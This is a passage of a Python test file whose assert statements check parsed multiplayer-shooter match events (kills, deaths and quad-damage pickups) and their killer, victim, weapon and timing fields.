assert e[61]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[61]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[61]['DATA']['ROUND'] is None # noqa
assert e[61]['DATA']['SUICIDE'] is None # noqa
assert e[61]['DATA']['TEAMKILL'] is None # noqa
assert e[61]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[61]['DATA']['TEAM_DEAD'] is None # noqa
assert e[61]['DATA']['TIME'] == 220.8 # noqa
assert e[61]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[61]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[61]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[61]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[61]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[61]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[61]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[61]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[61]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[61]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[61]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[61]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[61]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[61]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[61]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[61]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[61]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[61]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[61]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[61]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[61]['DATA']['WARMUP'] == False # noqa
assert e[61]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[62]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[62]['DATA']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[62]['DATA']['TIME'] == 225.8 # noqa
assert e[62]['DATA']['WARMUP'] == False # noqa
assert e[62]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[63]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[63]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[63]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[63]['DATA']['KILLER']['BOT'] is None # noqa
assert e[63]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[63]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[63]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[63]['DATA']['KILLER']['NAME'] is None # noqa
assert e[63]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[63]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[63]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[63]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[63]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[63]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[63]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[63]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[63]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[63]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[63]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[63]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[63]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[63]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[63]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[63]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[63]['DATA']['ROUND'] is None # noqa
assert e[63]['DATA']['SUICIDE'] is None # noqa
assert e[63]['DATA']['TEAMKILL'] is None # noqa
assert e[63]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[63]['DATA']['TEAM_DEAD'] is None # noqa
assert e[63]['DATA']['TIME'] == 230.0 # noqa
assert e[63]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[63]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[63]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[63]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[63]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[63]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[63]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[63]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[63]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[63]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[63]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[63]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[63]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[63]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[63]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[63]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[63]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[63]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[63]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[63]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[63]['DATA']['WARMUP'] == False # noqa
assert e[63]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[64]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[64]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[64]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[64]['DATA']['KILLER']['BOT'] is None # noqa
assert e[64]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[64]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[64]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[64]['DATA']['KILLER']['NAME'] is None # noqa
assert e[64]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[64]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[64]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[64]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[64]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[64]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[64]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[64]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[64]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[64]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[64]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[64]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[64]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[64]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[64]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[64]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[64]['DATA']['ROUND'] is None # noqa
assert e[64]['DATA']['SUICIDE'] is None # noqa
assert e[64]['DATA']['TEAMKILL'] is None # noqa
assert e[64]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[64]['DATA']['TEAM_DEAD'] is None # noqa
assert e[64]['DATA']['TIME'] == 230.0 # noqa
assert e[64]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[64]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[64]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[64]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[64]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[64]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[64]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[64]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[64]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[64]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[64]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[64]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[64]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[64]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[64]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[64]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[64]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[64]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[64]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[64]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[64]['DATA']['WARMUP'] == False # noqa
assert e[64]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[65]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[65]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[65]['DATA']['TIME'] == 230.0 # noqa
assert e[65]['DATA']['WARMUP'] == False # noqa
assert e[65]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[66]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[66]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[66]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[66]['DATA']['KILLER']['BOT'] is None # noqa
assert e[66]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[66]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[66]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[66]['DATA']['KILLER']['NAME'] is None # noqa
assert e[66]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[66]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[66]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[66]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[66]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[66]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[66]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[66]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[66]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[66]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[66]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[66]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[66]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[66]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[66]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[66]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[66]['DATA']['ROUND'] is None # noqa
assert e[66]['DATA']['SUICIDE'] is None # noqa
assert e[66]['DATA']['TEAMKILL'] is None # noqa
assert e[66]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[66]['DATA']['TEAM_DEAD'] is None # noqa
assert e[66]['DATA']['TIME'] == 246.3 # noqa
assert e[66]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[66]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[66]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[66]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[66]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[66]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[66]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[66]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[66]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[66]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[66]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[66]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[66]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[66]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[66]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[66]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[66]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[66]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[66]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[66]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[66]['DATA']['WARMUP'] == False # noqa
assert e[66]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[67]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[67]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[67]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[67]['DATA']['KILLER']['BOT'] is None # noqa
assert e[67]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[67]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[67]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[67]['DATA']['KILLER']['NAME'] is None # noqa
assert e[67]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[67]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[67]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[67]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[67]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[67]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[67]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[67]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[67]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[67]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[67]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[67]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[67]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[67]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[67]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[67]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[67]['DATA']['ROUND'] is None # noqa
assert e[67]['DATA']['SUICIDE'] is None # noqa
assert e[67]['DATA']['TEAMKILL'] is None # noqa
assert e[67]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[67]['DATA']['TEAM_DEAD'] is None # noqa
assert e[67]['DATA']['TIME'] == 246.3 # noqa
assert e[67]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[67]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[67]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[67]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[67]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[67]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[67]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[67]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[67]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[67]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[67]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[67]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[67]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[67]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[67]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[67]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[67]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[67]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[67]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[67]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[67]['DATA']['WARMUP'] == False # noqa
assert e[67]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[68]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[68]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[68]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[68]['DATA']['KILLER']['BOT'] is None # noqa
assert e[68]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[68]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[68]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[68]['DATA']['KILLER']['NAME'] is None # noqa
assert e[68]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[68]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[68]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[68]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[68]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[68]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[68]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[68]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[68]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[68]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[68]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[68]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[68]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[68]['DATA']['MOD'] == 'PLASMA_SPLASH' # noqa
assert e[68]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[68]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[68]['DATA']['ROUND'] is None # noqa
assert e[68]['DATA']['SUICIDE'] is None # noqa
assert e[68]['DATA']['TEAMKILL'] is None # noqa
assert e[68]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[68]['DATA']['TEAM_DEAD'] is None # noqa
assert e[68]['DATA']['TIME'] == 260.0 # noqa
assert e[68]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[68]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[68]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[68]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[68]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[68]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[68]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[68]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[68]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[68]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[68]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[68]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[68]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[68]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[68]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[68]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[68]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[68]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[68]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[68]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[68]['DATA']['WARMUP'] == False # noqa
assert e[68]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[69]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[69]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[69]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[69]['DATA']['KILLER']['BOT'] is None # noqa
assert e[69]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[69]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[69]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[69]['DATA']['KILLER']['NAME'] is None # noqa
assert e[69]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[69]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[69]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[69]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[69]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[69]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[69]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[69]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[69]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[69]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[69]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[69]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[69]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[69]['DATA']['MOD'] == 'PLASMA_SPLASH' # noqa
assert e[69]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[69]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[69]['DATA']['ROUND'] is None # noqa
assert e[69]['DATA']['SUICIDE'] is None # noqa
assert e[69]['DATA']['TEAMKILL'] is None # noqa
assert e[69]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[69]['DATA']['TEAM_DEAD'] is None # noqa
assert e[69]['DATA']['TIME'] == 260.0 # noqa
assert e[69]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[69]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[69]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[69]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[69]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[69]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[69]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[69]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[69]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[69]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[69]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[69]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[69]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[69]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[69]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[69]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[69]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[69]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[69]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[69]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[69]['DATA']['WARMUP'] == False # noqa
assert e[69]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[70]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[70]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[70]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[70]['DATA']['KILLER']['BOT'] is None # noqa
assert e[70]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[70]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[70]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[70]['DATA']['KILLER']['NAME'] is None # noqa
assert e[70]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[70]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[70]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[70]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[70]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[70]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[70]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[70]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[70]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[70]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[70]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[70]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[70]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[70]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[70]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[70]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[70]['DATA']['ROUND'] is None # noqa
assert e[70]['DATA']['SUICIDE'] is None # noqa
assert e[70]['DATA']['TEAMKILL'] is None # noqa
assert e[70]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[70]['DATA']['TEAM_DEAD'] is None # noqa
assert e[70]['DATA']['TIME'] == 300.4 # noqa
assert e[70]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[70]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[70]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[70]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[70]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[70]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[70]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[70]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[70]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[70]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[70]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[70]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[70]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[70]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[70]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[70]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[70]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[70]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[70]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[70]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[70]['DATA']['WARMUP'] == False # noqa
assert e[70]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[71]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[71]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[71]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[71]['DATA']['KILLER']['BOT'] is None # noqa
assert e[71]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[71]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[71]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[71]['DATA']['KILLER']['NAME'] is None # noqa
assert e[71]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[71]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[71]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[71]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[71]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[71]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[71]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[71]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[71]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[71]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[71]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[71]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[71]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[71]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[71]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[71]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[71]['DATA']['ROUND'] is None # noqa
assert e[71]['DATA']['SUICIDE'] is None # noqa
assert e[71]['DATA']['TEAMKILL'] is None # noqa
assert e[71]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[71]['DATA']['TEAM_DEAD'] is None # noqa
assert e[71]['DATA']['TIME'] == 300.4 # noqa
assert e[71]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[71]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[71]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[71]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[71]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[71]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[71]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[71]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[71]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
